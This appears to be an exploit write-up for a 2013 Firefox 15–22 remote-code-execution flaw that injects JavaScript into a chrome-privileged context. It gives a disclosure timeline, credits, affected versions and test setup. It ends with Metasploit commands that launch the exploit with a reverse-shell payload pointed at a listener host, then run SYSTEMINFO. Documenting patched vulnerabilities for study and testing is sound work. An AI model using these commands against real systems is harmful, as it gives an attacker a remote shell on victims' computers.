Timeline :
Vulnerability discovered by moz_bug_r_a4
Vulnerability reported to the vendor by moz_bug_r_a4 the 2013-05-12
Patched by the vendor the 2013-08-06
Metasploit PoC provided the 2014-08-15
PoC provided by :
moz_bug_r_a4
Cody Crews
joev
Reference(s) :
Affected version(s) :
All versions of Mozilla Firefox versions between 15 and 22 included.
Tested on :
Windows 7 SP1 with Mozilla Firefox 22.0
Description :
This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome://privileges.
Commands :
use exploit/multi/browser/firefox_tostring_console_injection set SRVHOST 192.168.6.138 set PAYLOAD firefox/shell_reverse_tcp set LHOST 192.168.6.138 exploit SYSTEMINFO